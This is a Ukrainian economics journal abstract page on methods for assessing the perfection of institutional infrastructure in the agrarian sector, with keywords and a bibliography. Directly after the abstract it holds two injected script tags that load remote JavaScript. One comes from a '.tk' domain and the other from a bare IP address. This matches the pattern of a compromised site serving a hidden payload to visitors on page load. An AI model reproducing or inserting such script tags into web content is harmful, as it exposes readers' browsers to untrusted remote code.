ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341.2:338.49
Інституціональні проблеми розвитку аграрної сфери

Досконалість інституційної інфраструктури та її оцінка: теоретичний аспект / Костирко І. Г., Тимофіїв С. В. // Економіка АПК. - 2014. - № 2 - С. 81

Визначено місце інституційної інфраструктури у структурі економічного механізму та її роль у формуванні стану аграрного сектору економіки України. Зазначено про недостатню дослідженість категорії досконалості інституційної інфраструктури, уточнено її визначення, вказано на труднощі, які виникають при реалізації інститутами своїх функцій у реальних економічних умовах. Досліджено економічні категорії «досконала інституційна інфраструктура» і «досконалість інституційної інфраструктури». Запропоновано концепцію методології оцінки досконалості інституційної інфраструктури, наведено приклад застосування цієї методології, обґрунтовано практичне її значення для цілей регулювання економічного механізму. Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: економічний механізм, інституційна інфраструктура, досконалість, оцінка, критерії, методологія, аграрний сектор

Список використаних джерел

 1. Coase R.H. The Firm, the Market and the Law / R.H. Coase. – Chicago, 1988.
 2. North D.C. Institutions, Institutional Change and Economic Performance / D.C. North. – Cambridge : Cambridge University Press, 1990. – 152 p.
 3. Веблен Т. Теория праздного класса / Т. Веблен. – М. : Прогресс, 1984. – 368 с.
 4. Гриценко А. Институциональная архитектоника: объект, теория и методология / А. Гриценко // Постсоветский институционализм : моногр.; под ред. Р.М. Нуреева, В.В. Дементьева. – Донецк : Каштан, 2005. – С. 49-74.
 5. Економіка України: стратегія і політика довгострокового розвитку // В.М. Геєць, В.І. Голіков, Б.Є. Кваснюк та ін.; за ред. В.М. Гейця. – К. : Фенікс, 2003. – 1008 с.
 6. Кирдина С.Г. Институциональные матрицы: макросоциологическая объяснительная гипотеза / С.Г. Кирдина // СОЦИС. – 2001. – № 2. – С. 13-23.
 7. Король Т.А. К вопросу о классификации объектов инфраструктуры [Электронный ресурс] / Т.А. Король // Диалоги о науке. – 2009. – № 3. – Режим доступа : http://www.strategplann.ru/scientific-articles/on-the-classification-of-infrastructure.html.
 8. Костирко І.Г. Сукупні витрати аграрного виробництва в умовах трансформаційного етапу / І.Г. Костирко, С.В. Тимофіїв // Вісн. Львівського нац. аграр. ун-ту. Економіка АПК. – Львів, 2012. – № 19(1). – С. 365-372.
 9. Лопатинський Ю.М. Інституціоналізація транзитивної економіки / Ю.М. Лопатинський // Науч. труды ДонНТУ. Серия: экономическая. – 2006. – Вып. 103-1. – С. 229-232.
 10. Малік М.Й. Інститути та інституції у розвитку аграрної сфери економіки / М.Й. Малік, О.Г. Шпикуляк // Економіка АПК. – 2011. – №7. – С. 169-176.
 11. Национальная философская энциклопедия [Электронный ресурс]. – Режим доступа : http://terme.ru/dictionary/879/word/sovershenstvo.
 12. Носова С.С. Инфраструктура: определение и специфические признаки [Электронный ресурс] / С.С. Носова // Экономическая теория. – 2008. – Режим доступа : http://uchebnik-besplatno.com/teoriya-ekonomicheskaya/ekonomicheskaya-teoriya-nosova.html.
 13. Саблук П.Т. Розвиток інституцій удосконалення механізму реформування аграрного сектору економіки / П.Т. Саблук // Економіка АПК. – 2010. – №10. – С. 3-10.
 14. Уильямсон О.И. Экономические институты капитализма: фирмы, рынки, «отношенческая» контрактация / О.И. Уильямсон. – СПб. : Лениздат, 1996. – 702 с.
 15. Якубенко В.Д. Базисні інститути у трансформаційній економіці : моногр. / В.Д. Якубенко. − К. : КНЕУ, 2003. − 252 с.
Читати статтю: 14_02_81-86.pdf
Читати переклад статті: 1402kostyrko_tymofiiv.pdf